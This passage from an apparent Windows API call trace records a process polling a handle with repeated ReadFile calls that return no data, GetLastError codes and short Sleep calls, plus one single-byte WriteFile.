	[0244.097] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.097] GetLastError () returned 0x218
	[0244.097] Sleep (dwMilliseconds=0xa) 
	[0244.141] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.141] GetLastError () returned 0x218
	[0244.141] Sleep (dwMilliseconds=0xa) 
	[0244.204] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.204] GetLastError () returned 0x218
	[0244.204] Sleep (dwMilliseconds=0xa) 
	[0244.219] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.219] GetLastError () returned 0x218
	[0244.219] Sleep (dwMilliseconds=0xa) 
	[0244.235] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.235] GetLastError () returned 0x218
	[0244.235] Sleep (dwMilliseconds=0xa) 
	[0244.251] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.251] GetLastError () returned 0x218
	[0244.251] Sleep (dwMilliseconds=0xa) 
	[0244.267] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.267] GetLastError () returned 0x218
	[0244.267] Sleep (dwMilliseconds=0xa) 
	[0244.282] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.282] GetLastError () returned 0x218
	[0244.283] Sleep (dwMilliseconds=0xa) 
	[0244.299] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.299] GetLastError () returned 0x218
	[0244.299] Sleep (dwMilliseconds=0xa) 
	[0244.314] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.314] GetLastError () returned 0x218
	[0244.314] Sleep (dwMilliseconds=0xa) 
	[0244.360] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.360] GetLastError () returned 0x218
	[0244.360] Sleep (dwMilliseconds=0xa) 
	[0244.406] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.406] GetLastError () returned 0x218
	[0244.406] Sleep (dwMilliseconds=0xa) 
	[0244.454] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.454] GetLastError () returned 0x218
	[0244.454] Sleep (dwMilliseconds=0xa) 
	[0244.469] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.469] GetLastError () returned 0x218
	[0244.469] Sleep (dwMilliseconds=0xa) 
	[0244.486] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.486] GetLastError () returned 0x218
	[0244.486] Sleep (dwMilliseconds=0xa) 
	[0244.547] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.547] GetLastError () returned 0x218
	[0244.547] Sleep (dwMilliseconds=0xa) 
	[0244.572] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.572] GetLastError () returned 0x218
	[0244.572] Sleep (dwMilliseconds=0xa) 
	[0244.609] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.609] GetLastError () returned 0x218
	[0244.609] Sleep (dwMilliseconds=0xa) 
	[0244.657] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.657] GetLastError () returned 0x218
	[0244.657] Sleep (dwMilliseconds=0xa) 
	[0244.702] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.702] GetLastError () returned 0x218
	[0244.702] Sleep (dwMilliseconds=0xa) 
	[0244.725] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.725] GetLastError () returned 0x218
	[0244.725] Sleep (dwMilliseconds=0xa) 
	[0244.734] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.734] GetLastError () returned 0x218
	[0244.734] Sleep (dwMilliseconds=0xa) 
	[0244.749] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.749] GetLastError () returned 0x218
	[0244.749] Sleep (dwMilliseconds=0xa) 
	[0244.765] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.765] GetLastError () returned 0x218
	[0244.765] Sleep (dwMilliseconds=0xa) 
	[0244.781] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.781] GetLastError () returned 0x218
	[0244.782] Sleep (dwMilliseconds=0xa) 
	[0244.797] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.797] GetLastError () returned 0x218
	[0244.797] Sleep (dwMilliseconds=0xa) 
	[0244.812] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.812] GetLastError () returned 0x218
	[0244.813] Sleep (dwMilliseconds=0xa) 
	[0244.827] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.827] GetLastError () returned 0x218
	[0244.827] Sleep (dwMilliseconds=0xa) 
	[0244.874] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.874] GetLastError () returned 0x218
	[0244.874] Sleep (dwMilliseconds=0xa) 
	[0244.920] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.921] GetLastError () returned 0x218
	[0244.921] Sleep (dwMilliseconds=0xa) 
	[0244.969] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.969] GetLastError () returned 0x218
	[0244.969] Sleep (dwMilliseconds=0xa) 
	[0244.984] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0244.984] GetLastError () returned 0x218
	[0244.984] Sleep (dwMilliseconds=0xa) 
	[0245.000] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.000] GetLastError () returned 0x218
	[0245.000] Sleep (dwMilliseconds=0xa) 
	[0245.046] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.046] GetLastError () returned 0x218
	[0245.047] Sleep (dwMilliseconds=0xa) 
	[0245.088] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.088] GetLastError () returned 0x218
	[0245.088] Sleep (dwMilliseconds=0xa) 
	[0245.125] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.125] GetLastError () returned 0x218
	[0245.125] Sleep (dwMilliseconds=0xa) 
	[0245.180] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.180] GetLastError () returned 0x218
	[0245.180] Sleep (dwMilliseconds=0xa) 
	[0245.218] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.218] GetLastError () returned 0x218
	[0245.218] Sleep (dwMilliseconds=0xa) 
	[0245.233] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.233] GetLastError () returned 0x218
	[0245.233] Sleep (dwMilliseconds=0xa) 
	[0245.249] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.249] GetLastError () returned 0x218
	[0245.249] Sleep (dwMilliseconds=0xa) 
	[0245.265] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.265] GetLastError () returned 0x218
	[0245.265] Sleep (dwMilliseconds=0xa) 
	[0245.280] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.280] GetLastError () returned 0x218
	[0245.281] Sleep (dwMilliseconds=0xa) 
	[0245.297] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.297] GetLastError () returned 0x218
	[0245.297] Sleep (dwMilliseconds=0xa) 
	[0245.312] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.312] GetLastError () returned 0x218
	[0245.312] Sleep (dwMilliseconds=0xa) 
	[0245.327] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.327] GetLastError () returned 0x218
	[0245.327] Sleep (dwMilliseconds=0xa) 
	[0245.342] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.342] GetLastError () returned 0x218
	[0245.342] Sleep (dwMilliseconds=0xa) 
	[0245.397] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.397] GetLastError () returned 0x218
	[0245.397] Sleep (dwMilliseconds=0xa) 
	[0245.437] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.437] GetLastError () returned 0x218
	[0245.437] Sleep (dwMilliseconds=0xa) 
	[0245.484] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.484] GetLastError () returned 0x218
	[0245.484] Sleep (dwMilliseconds=0xa) 
	[0245.508] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.508] GetLastError () returned 0x218
	[0245.508] Sleep (dwMilliseconds=0xa) 
	[0245.514] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.514] GetLastError () returned 0x218
	[0245.515] Sleep (dwMilliseconds=0xa) 
	[0245.530] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.530] GetLastError () returned 0x218
	[0245.530] Sleep (dwMilliseconds=0xa) 
	[0245.547] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.547] GetLastError () returned 0x218
	[0245.547] Sleep (dwMilliseconds=0xa) 
	[0245.561] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.561] GetLastError () returned 0x218
	[0245.561] Sleep (dwMilliseconds=0xa) 
	[0245.577] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0245.577] GetLastError () returned 0x218
	[0245.577] Sleep (dwMilliseconds=0x3e8) 
	[0246.612] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0246.612] Sleep (dwMilliseconds=0xa) 
	[0246.624] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.625] GetLastError () returned 0x218
	[0246.625] Sleep (dwMilliseconds=0xa) 
	[0246.637] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.637] GetLastError () returned 0x218
	[0246.637] Sleep (dwMilliseconds=0xa) 
	[0246.653] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.653] GetLastError () returned 0x218
	[0246.653] Sleep (dwMilliseconds=0xa) 
	[0246.668] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.669] GetLastError () returned 0x218
	[0246.669] Sleep (dwMilliseconds=0xa) 
	[0246.684] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.684] GetLastError () returned 0x218
	[0246.684] Sleep (dwMilliseconds=0xa) 
	[0246.731] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.731] GetLastError () returned 0x218
	[0246.731] Sleep (dwMilliseconds=0xa) 
	[0246.777] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.777] GetLastError () returned 0x218
	[0246.777] Sleep (dwMilliseconds=0xa) 
	[0246.823] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.823] GetLastError () returned 0x218
	[0246.823] Sleep (dwMilliseconds=0xa) 
	[0246.824] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.824] GetLastError () returned 0x218
	[0246.824] Sleep (dwMilliseconds=0xa) 
	[0246.839] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.839] GetLastError () returned 0x218
	[0246.839] Sleep (dwMilliseconds=0xa) 
	[0246.856] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.856] GetLastError () returned 0x218
	[0246.856] Sleep (dwMilliseconds=0xa) 
	[0246.871] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.871] GetLastError () returned 0x218
	[0246.871] Sleep (dwMilliseconds=0xa) 
	[0246.886] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.887] GetLastError () returned 0x218
	[0246.887] Sleep (dwMilliseconds=0xa) 
	[0246.903] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.903] GetLastError () returned 0x218
	[0246.904] Sleep (dwMilliseconds=0xa) 
	[0246.949] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.949] GetLastError () returned 0x218
	[0246.949] Sleep (dwMilliseconds=0xa) 
	[0246.998] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0246.998] GetLastError () returned 0x218
	[0246.998] Sleep (dwMilliseconds=0xa) 
	[0247.044] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.044] GetLastError () returned 0x218
	[0247.044] Sleep (dwMilliseconds=0xa) 
	[0247.090] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.090] GetLastError () returned 0x218
	[0247.090] Sleep (dwMilliseconds=0xa) 
	[0247.105] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.105] GetLastError () returned 0x218
	[0247.105] Sleep (dwMilliseconds=0xa) 
	[0247.122] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0247.122] GetLastError () returned 0x218
	[0247.122] Sleep (dwMilliseconds=0xa) 
